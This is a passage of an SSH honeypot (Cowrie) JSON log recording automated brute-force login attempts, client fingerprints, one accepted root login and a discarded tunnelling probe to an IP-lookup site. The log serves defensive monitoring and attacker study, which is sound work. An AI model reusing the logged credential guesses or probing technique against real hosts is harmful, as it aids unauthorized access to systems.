,"blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:04:15.099420Z","src_ip":"212.227.235.229","session":"7167f5abecc6"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:04:17.041840Z","src_ip":"212.227.235.229","session":"94ad85fc01f3"}
{"eventid":"cowrie.login.failed","username":"support","password":"support","message":"login attempt [support/support] failed","sensor":"my-vps","timestamp":"2025-08-26T04:04:17.399978Z","src_ip":"212.227.235.229","session":"7167f5abecc6"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:04:19.813370Z","src_ip":"212.227.235.229","session":"7167f5abecc6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60076,"dst_ip":"1.2.3.4","dst_port":22,"session":"35f149726a7a","protocol":"ssh","message":"New connection: 212.227.235.229:60076 (1.2.3.4:22) [session: 35f149726a7a]","sensor":"my-vps","timestamp":"2025-08-26T04:04:25.780179Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:04:25.939752Z","src_ip":"212.227.235.229","session":"35f149726a7a"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:04:26.729869Z","src_ip":"212.227.235.229","session":"35f149726a7a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60080,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ca765eacc01","protocol":"ssh","message":"New connection: 212.227.235.229:60080 (1.2.3.4:22) [session: 9ca765eacc01]","sensor":"my-vps","timestamp":"2025-08-26T04:04:27.098841Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:04:27.254625Z","src_ip":"212.227.235.229","session":"9ca765eacc01"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:04:27.439393Z","src_ip":"212.227.235.229","session":"9ca765eacc01"}
{"eventid":"cowrie.login.failed","username":"installer","password":"installer","message":"login attempt [installer/installer] failed","sensor":"my-vps","timestamp":"2025-08-26T04:04:29.306519Z","src_ip":"212.227.235.229","session":"35f149726a7a"}
{"eventid":"cowrie.login.success","username":"root","password":"@","message":"login attempt [root/@] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:04:30.322609Z","src_ip":"212.227.235.229","session":"9ca765eacc01"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-26T04:04:30.591120Z","session":"9ca765eacc01"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T04:04:30.864036Z","src_ip":"212.227.235.229","session":"9ca765eacc01"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:04:31.155394Z","src_ip":"212.227.235.229","session":"9ca765eacc01"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:04:31.294525Z","src_ip":"212.227.235.229","session":"35f149726a7a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48027,"dst_ip":"1.2.3.4","dst_port":22,"session":"a279e2496dbf","protocol":"ssh","message":"New connection: 212.227.235.229:48027 (1.2.3.4:22) [session: a279e2496dbf]","sensor":"my-vps","timestamp":"2025-08-26T04:04:35.067248Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T04:04:35.068289Z","src_ip":"212.227.235.229","session":"a279e2496dbf"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T04:04:35.175655Z","src_ip":"212.227.235.229","session":"a279e2496dbf"}
{"eventid":"cowrie.login.failed","username":"admin","password":"tomboy","message":"login attempt [admin/tomboy] failed","sensor":"my-vps","timestamp":"2025-08-26T04:04:35.688758Z","src_ip":"212.227.235.229","session":"a279e2496dbf"}
{"eventid":"cowrie.login.failed","username":"admin","password":"tom123","message":"login attempt [admin/tom123] failed","sensor":"my-vps","timestamp":"2025-08-26T04:04:36.798646Z","src_ip":"212.227.235.229","session":"a279e2496dbf"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55462,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa7159407107","protocol":"ssh","message":"New connection: 217.72.205.35:55462 (1.2.3.4:22) [session: fa7159407107]","sensor":"my-vps","timestamp":"2025-08-26T04:04:37.095349Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:04:37.097008Z","src_ip":"217.72.205.35","session":"fa7159407107"}
{"eventid":"cowrie.login.failed","username":"admin","password":"theshit","message":"login attempt [admin/theshit] failed","sensor":"my-vps","timestamp":"2025-08-26T04:04:37.908767Z","src_ip":"212.227.235.229","session":"a279e2496dbf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55562,"dst_ip":"1.2.3.4","dst_port":22,"session":"80dd15b0d65c","protocol":"ssh","message":"New connection: 212.227.235.229:55562 (1.2.3.4:22) [session: 80dd15b0d65c]","sensor":"my-vps","timestamp":"2025-08-26T04:04:38.365449Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:04:38.394111Z","src_ip":"212.227.235.229","session":"80dd15b0d65c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"theclash","message":"login attempt [admin/theclash] failed","sensor":"my-vps","timestamp":"2025-08-26T04:04:39.019237Z","src_ip":"212.227.235.229","session":"a279e2496dbf"}
{"eventid":"cowrie.login.failed","username":"admin","password":"terri","message":"login attempt [admin/terri] failed","sensor":"my-vps","timestamp":"2025-08-26T04:04:40.127937Z","src_ip":"212.227.235.229","session":"a279e2496dbf"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:04:41.238864Z","src_ip":"212.227.235.229","session":"a279e2496dbf"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:04:42.039367Z","src_ip":"212.227.235.229","session":"80dd15b0d65c"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":38466,"dst_ip":"1.2.3.4","dst_port":22,"session":"de87cd8abe64","protocol":"ssh","message":"New connection: 68.183.87.241:38466 (1.2.3.4:22) [session: de87cd8abe64]","sensor":"my-vps","timestamp":"2025-08-26T04:04:43.057849Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:04:43.058785Z","src_ip":"68.183.87.241","session":"de87cd8abe64"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:04:43.313771Z","src_ip":"68.183.87.241","session":"de87cd8abe64"}
{"eventid":"cowrie.login.failed","username":"app","password":"123qwe","message":"login attempt [app/123qwe] failed","sensor":"my-vps","timestamp":"2025-08-26T04:04:44.383886Z","src_ip":"68.183.87.241","session":"de87cd8abe64"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43778,"dst_ip":"1.2.3.4","dst_port":22,"session":"64471ad4e36a","protocol":"ssh","message":"New connection: 212.227.235.229:43778 (1.2.3.4:22) [session: 64471ad4e36a]","sensor":"my-vps","timestamp":"2025-08-26T04:04:44.563610Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:04:44.564380Z","src_ip":"212.227.235.229","session":"64471ad4e36a"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:04:44.861187Z","src_ip":"212.227.235.229","session":"64471ad4e36a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","message":"login attempt [admin/1234] failed","sensor":"my-vps","timestamp":"2025-08-26T04:04:45.335254Z","src_ip":"212.227.235.229","session":"80dd15b0d65c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42568,"dst_ip":"1.2.3.4","dst_port":22,"session":"885b23bb41c3","protocol":"ssh","message":"New connection: 212.227.235.229:42568 (1.2.3.4:22) [session: 885b23bb41c3]","sensor":"my-vps","timestamp":"2025-08-26T04:04:45.554632Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:04:45.555630Z","src_ip":"212.227.235.229","session":"885b23bb41c3"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:04:45.640442Z","src_ip":"68.183.87.241","session":"de87cd8abe64"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45030,"dst_ip":"1.2.3.4","dst_port":22,"session":"f945857751b6","protocol":"ssh","message":"New connection: 212.227.235.229:45030 (1.2.3.4:22) [session: f945857751b6]","sensor":"my-vps","timestamp":"2025-08-26T04:04:46.748666Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh